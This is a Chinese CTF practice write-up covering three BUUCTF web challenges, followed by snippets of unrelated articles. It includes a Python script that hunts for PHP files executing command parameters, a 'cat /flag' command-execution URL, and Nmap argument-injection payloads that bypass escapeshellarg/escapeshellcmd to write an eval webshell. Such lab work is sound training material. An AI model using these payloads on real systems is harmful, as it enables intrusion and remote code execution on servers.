[BT]BUUCTF刷题第17天(4.15)

第17天(共3题)

Web

[强网杯 2019]高明的黑客

在这里插入图片描述
.tar.gz 是 Linux 系统下的压缩包,访问即可下载

打开后有3000多个php文件,通过题解得知需要写Python脚本找出合适的GetShell文件(因为每个文件里都会通过system函数执行命令,但不是每个函数都带有参数)
在这里插入图片描述

在这里插入图片描述

因为拿到了所有PHP文件,所以我们可以在本地搭建环境运行脚本(我的本地环境搭建域名是localtest

在这里插入图片描述

接下来就是使用脚本(来自大佬题解)

import os
import requests
import re
import threading
import time
print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100)  							  	#这儿设置最大的线程数
filePath = r"D:/CTF/PHP_Study/phpstudy_pro/WWW/src"         #自己替换为文件所在目录(我的是
															#D:/CTF/PHP_Study/phpstudy_pro/WWW/src)
os.chdir(filePath)													#改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5								#设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False											 # 设置连接活跃状态为False
def get_content(file):
    s1.acquire()
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:							#打开php文件,提取所有的$_GET和$_POST的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}														#所有的$_POST
    params = {}														#所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://localtest/'+file                      #自己替换为本地url
    req = session.post(url, data=data, params=params)			#一次性请求所有的GET和POST
    req.close()												# 关闭请求  释放内存
    req.encoding = 'utf-8'
    content = req.text
    #print(content)
    if "xxxxxx" in content:									#如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()												# 关闭请求  释放内存
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()												# 关闭请求  释放内存
                if "xxxxxx" in content:
                    break
        if flag == 1:													#flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:															#加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

原理是遍历目录下所有文件,然后定义了一个函数逐个打开文件,再正则表达式匹配获取所有的 GET 参数POST 参数,再访问 url 传入参数验证是否可用。

判断的方法是令传入的参数在访问页面显示一个内容echo 'XXXXXX',然后再判断页面有没有这个内容,有则传入的参数执行成功,没有则无效的。

在这里插入图片描述

构造URL:http://1955d020-deb3-447d-b433-7bc05ed1cbc8.node5.buuoj.cn:81/xk0SzyKwfzw.php?Efa5BVG=cat /flag

得到flag

在这里插入图片描述

[ASIS 2019]Unicorn shop

在这里插入图片描述

这是一个购买独角兽的商店,尝试购买第一个独角兽

在这里插入图片描述

发现除了购买第一个,购买第二三个也会显示以下界面

在这里插入图片描述

但购买第四个显示的是:

在这里插入图片描述

意思是金额只能输入一个字符,但是价格1337,是四个字符,通过题目名字里的Unicode和题解得知需要找到一个Unicode编码的字符,其值大于1337

在 这个网站 搜索thousand,找到一个比1337大的字符

在这里插入图片描述

复制提交即可

在这里插入图片描述

在这里插入图片描述

[网鼎杯 2020 朱雀组]Nmap

在这里插入图片描述

这是一道有关Namp的题目

扫描127.0.0.1返回以下内容

在这里插入图片描述

Nmap的输出命令:
主要只有四种:

-oN < filespec > (标准输出)
-oX < filespec> (XML输出)
-oS < filespec> (ScRipT KIdd|3 oUTpuT)
-oG < filespec> (Grep输出)

其中以 -oN-oG 为主

在本地Linux中使用Namp将一句话木马写入文件需要对一句话木马用引号括起:

namp '<?php @eval($_POST[hack]);?>' -oG shell.php

或者进行转义:

namp \<\?php @eval\(\$_POST\[hack\]\)\;\?\> -oG shell.php

尝试127.0.0.1 | ls,返回以下内容

在这里插入图片描述

说明极有可能网站使用了escapeshellcmd()函数对字符串进行了转义

接下来说明escapeshellarg()函数escapeshellcmd()函数的功能:

escapeshellarg()函数用于为字符串添加单引号,因此shell不会解释其中的特殊字符。如果字符串中已经有单引号了,那么该函数会先对字符串中的单引号做转义,再分别用两对单引号括起转义单引号前后的两段字符串

escapeshellcmd()函数用于对字符串中可能会欺骗shell执行任意命令的字符进行转义。此函数保证用户输入的数据安全

例如传入127.0.0.1' -v -d a=1

经过escapeshellarg()函数处理后变为:

'127.0.0.1'    \'     ' -v -d a=1'

这里为了方便看我把两段字符串分的很开

如果我们构造127.0.0.1 | <?php @eval($_POST[hack]);?> -oG shell.php

那么经过两个函数的处理就会变成:

'127.0.0.1 | \<\?php @eval\(\)\;\?\> -oG hack.php '

这是一段字符串,并且里面的特殊符号还被转义了,我们知道为了将一句话木马写入文件可以用单引号括起或者转义,但这里两者兼具反而不行,因此我们要考虑把单引号省略掉

在原基础上左右各添加一个单引号:

' <?php @eval($_POST[hack]);?> -oG shell.php '   //注意单引号和<要隔一个空格防止<被转义

但是网站限制了php字样,所以上面的例子要改为:

' <?=@eval($_POST[hack]);?> -oG hack.phtml '    //<? ?>是短标签

这里解释一下,经过两个函数的处理后就会变为:

第一个:

''   \'  ' <?= @eval($_REQUEST[1]);?> -oG test.phtml'  \'    ''

第二个:

''   \\'   ' <\?= @eval$REQUEST\[1\]\;\?\> -oG test.phtml'   \\'   ''

前面和后面的''被主机解释为空连接符,\\被解释为普通没有功能的\,紧接后面的' '也是空连接符,后半部分的' \\'对前面的字符传就没有影响了,因此一句话木马成功省略掉了单引号,能够写入文件并执行

查询:

' <?=@eval($_POST[hack]);?> -oG hack.phtml '

返回以下内容说明写入成功
在这里插入图片描述
构造POST方法拿到flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/546961.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【Java开发指南 | 第九篇】访问实例变量和方法、继承、接口

专栏&#xff1a;Java开发指南 CSDN秋说 文章目录 访问实例变量和方法继承接口 访问实例变量和方法 通过已创建的对象来访问成员变量和成员方法&#xff0c;如下所示&#xff1a; /* 实例化对象 */ Object referenceVariable new Constructor(); /* 访问类中的变量 */ refer…

glitch功耗的问题在先进节点上更加突出

这个问题在 AI 加速器中尤为严重&#xff0c;修复这个问题需要一些tradeoff。 据估计&#xff0c;一些最先进和最复杂的芯片设计中总功耗的 20% 到 40% 被浪费了。 glitch功耗并不是一个新现象。在先进节点上&#xff0c;glitch功耗问题正变得越来越突出&#xff0c;没有一种解…

Android SQLite

一、使用SQLiteOpenHelper类创建数据库与版本管理 1、nCreate(database):首次使用软件时生成数据库表 2、onUpgrade(database,oldVersion,newVersion):在数据库的版本发生变化时会被调用&#xff0c; 一 般 在软件升级时才需改变版本号&#xff0c;而数据库的版本是由…

20240328-2-随机森林面试题RandomForest

随机森林面试题 1. 简单介绍随机森林 一种基于树模型的Bagging的优化版本&#xff0c;一棵树的生成肯定还是不如多棵树&#xff0c;因此就有了随机森林&#xff0c;解决决策树泛化能力弱的特点。 多次随机取样&#xff0c;多次随机取属性&#xff0c;选取最优分割点&#xff…

在Vue3中如何使用H.265视频流媒体播放器EasyPlayer.js?

H5无插件流媒体播放器EasyPlayer属于一款高效、精炼、稳定且免费的流媒体播放器&#xff0c;可支持多种流媒体协议播放&#xff0c;可支持H.264与H.265编码格式&#xff0c;性能稳定、播放流畅&#xff0c;能支持WebSocket-FLV、HTTP-FLV&#xff0c;HLS&#xff08;m3u8&#…

【uniapp踩坑记】——微信小程序转发保存图片

关于微信小程序转发&保存图片 微信小程序图片转发保存简单说明网络图片的转发保存base64流形式图片转发保存 已经好多年没写博客了&#xff0c;最近使用在用uniapp开发一个移动版管理后台&#xff0c;记录下自己踩过的一些坑 吃相别太难看&#xff0c;搞一堆下头僵尸号来点…

【YOLOv9】使用yolov9训练自己的数据集/验证 /推理 /参数分析

完胜V8的SOTA模型Yolov9(论文阅读笔记)内容 点击即可跳转 当今的YOLO系列武林盟主YOLOV9&#xff1a; YOLOv9的优秀表现&#xff1a; 环境&#xff1a; ubuntu20.04&#xff0c;无GPU&#xff0c;使用anaconda3创建的虚拟环境yolov9。 环境安装&#xff1a; conda create -n …

JavaSE图书管理系统

JavaSE图书管理系统 思路一.Main方法二.User包1.User类2.NormaUser类3.AdminUser类三.book包1.BookList类2.Book类四.operation包1.IOPeration接口2.AddOperation类新增图书3.BorrowOperation类借阅图书4.DelOperation类删除图书5.FindOperation类查找图书6.ReturnOperation类归…

Centos7配置IP地址

1、找到网卡名字 使用root用户登陆&#xff0c;输入命令 ifconfig 2、打开配置文件 输入命令&#xff0c;打开配置文件 vi /etc/sysconfig/network-scripts/ifcfg-ens33 3、添加IP地址 3.1修改BOOTPROTO 将“BOOTPROTOdhcp” 改为 “BOOTPROTOstatic” 3.2添加IP地址 在配…

【JavaEE多线程】从单例模式到线程池的深入探索

目录 多线程案例单例模式阻塞队列定时器线程池总结-保证线程安全的思路对比线程和进程 多线程案例 单例模式 单例模式是一种设计模式 设计模式&#xff0c;就是程序员的棋谱&#xff0c;这里介绍了很多典型场景&#xff0c;以及典型场景的处理方式&#xff0c;按照设计模式写…

火车头采集一键发布到Zblog

火车头采集发布到Zblog系统&#xff0c;主要操作步骤如下&#xff1a; 目录 1、Zblog火车头Web发布模块 2、内容发布参数映射&#xff0c;火车头发布到Zblog 3、简数一键发布到Zblog方法 1、Zblog火车头Web发布模块 自行编写Zblog火车头Web发布模块&#xff0c;一般要使用f…

Linux--进程间的通信--进程池

进程间的通信–匿名管道 进程池的概念 进程池是一种将多个进程组织起来以执行特定任务的机制。它由多个预先创建好的资源进程和一个管理进程组成。这些资源进程被管理进程负责分配和调度&#xff0c;用于处理任务。 当有新的任务提交时&#xff0c;管理进程会从进程池中取出一…

2024北京门窗展|2024北京门窗展会|2024北京门窗展览会

CWE中国&#xff08;北京&#xff09;国际系统门窗及幕墙博览会 CWE China&#xff08;Beijing&#xff09;International System Doors Windows and Curtain Walls Expo 2024年8月29-31日 北京&#xff0c;中国国际展览中心顺义馆 展会概况&#xff1a; 2024年CWE中国&…

【Unity】ScriptableObject 在游戏中的使用实例

ScriptableObject 在游戏中的使用实例 ScriptableObject 使用指南Unity 存储游戏数据的几种方法Unity ScriptableObject实例创建一个物品管理的ScriptableObject创建一个管理所有 ScriptableObject 的数据库&#xff08;ItemDBSO&#xff09; ScriptableObject 使用指南 Scrip…

回溯算法练习day.2

216.组合总和III 链接&#xff1a;. - 力扣&#xff08;LeetCode&#xff09; 题目描述&#xff1a; 找出所有相加之和为 n 的 k 个数的组合&#xff0c;且满足下列条件&#xff1a; 只使用数字1到9每个数字 最多使用一次 返回 所有可能的有效组合的列表 。该列表不能包含相…

基于STM32的RFID智能门锁系统

本文针对RFID技术&#xff0c;着重研究了基于单片机的智能门锁系统设计。首先&#xff0c;通过链接4*4按键模块与主控STM32&#xff0c;实现了多种模式&#xff0c;包括刷卡开锁、卡号权限管理、密码开锁、修改密码、显示实时时间等功能。其次&#xff0c;采用RC522模块与主控S…

【C语言基础】:预处理详解(二)

文章目录 一、宏和函数的对比二、#和##运算符2.1 #运算符2.2 ##运算符 三、#undef四、命令行定义五、条件编译六、头文件的包含1. 头文件包含的方式2. 嵌套文件包含 上期回顾&#xff1a; 【C语言基础】&#xff1a;预处理详解(一) 一、宏和函数的对比 宏通常被应有于执行简单…

Vue3---基础10(路由)

写一个最基本的路由导航 下载、创建、使用路由 下载路由 npm i vue-router 创建路由 先在 src 内去创建一个 router 文件夹 在文件夹内创建一个 index 文件 index.ts 内代码 // 创建一个路由器&#xff0c;并暴露出去 // 引入createRouter import { createRouter, createWeb…

CSS使用自己的字体

在项目的根目录下的static文件夹中放置字体文件。在项目中使用这个字体&#xff0c;需要2个步骤。 一. 你需要在全局样式文件中引入它。 假设你的全局样式文件是App.vue或者App.vue中引入的App.scss文件&#xff0c;你可以像这样引入字体文件&#xff1a; font-face {font-fa…

深度学习体系结构——CNN, RNN, GAN, Transformers, Encoder-Decoder Architectures算法原理与应用

1. 卷积神经网络 卷积神经网络&#xff08;CNN&#xff09;是一种特别适用于处理具有网格结构的数据&#xff0c;如图像和视频的人工神经网络。可以将其视作一个由多层过滤器构成的系统&#xff0c;这些过滤器能够处理图像并从中提取出有助于进行预测的有意义特征。 设想你手…